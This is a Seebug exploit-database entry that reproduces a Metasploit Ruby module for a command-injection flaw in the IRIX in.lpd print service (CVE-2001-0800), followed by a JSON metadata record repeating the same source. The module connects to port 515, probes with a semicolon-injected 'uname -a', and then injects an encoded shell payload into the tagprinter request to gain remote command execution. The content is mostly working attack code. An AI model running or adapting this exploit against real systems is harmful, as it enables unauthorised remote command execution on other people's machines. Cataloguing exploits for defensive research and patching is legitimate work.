ID SSV:67036
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Irix LPD tagprinter Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution flaw in
the in.lpd service shipped with all versions of Irix.
},
'Author' => [ 'optyx', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2001-0800'],
['OSVDB', '8573'],
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
],
'Privileged' => false,
'Platform' => ['unix', 'irix'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 512,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DisclosureDate' => 'Sep 01 2001',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515)
], self.class)
end
def check
connect
sock.put("T;uname -a;\n")
resp = sock.get_once
disconnect
if (resp =~ /IRIX/)
print_status("Response: #{resp.strip}")
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sock.put("T;#{payload.encoded};\n")
handler
print_status("Payload: #{payload.encoded}")
end
end
{"href": "https://www.seebug.org/vuldb/ssvid-67036", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Irix LPD tagprinter - Command Execution", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67036", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Irix LPD tagprinter Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits an arbitrary command execution flaw in\r\n\t\t\t\tthe in.lpd service shipped with all versions of Irix.\t\t\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'optyx', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2001-0800'],\r\n\t\t\t\t\t['OSVDB', '8573'],\r\n\t\t\t\t\t['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'irix'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\t\t\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic Target', { }]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Sep 01 2001',\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(515)\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tsock.put("T;uname -a;\\n")\r\n\t\tresp = sock.get_once\r\n\t\tdisconnect\r\n\t\t\r\n\t\tif (resp =~ /IRIX/)\r\n\t\t\tprint_status("Response: #{resp.strip}")\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\t\tsock.put("T;#{payload.encoded};\\n")\r\n\t\thandler\r\n\t\tprint_status("Payload: #{payload.encoded}")\r\n\tend\r\n\r\nend\r\n\n ", "id": "SSV:67036", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T16:55:54", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2017-11-19T16:55:54", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:55:54", "rev": 2}, "vulnersScore": 0.3}, "references": [], "immutableFields": []}
{}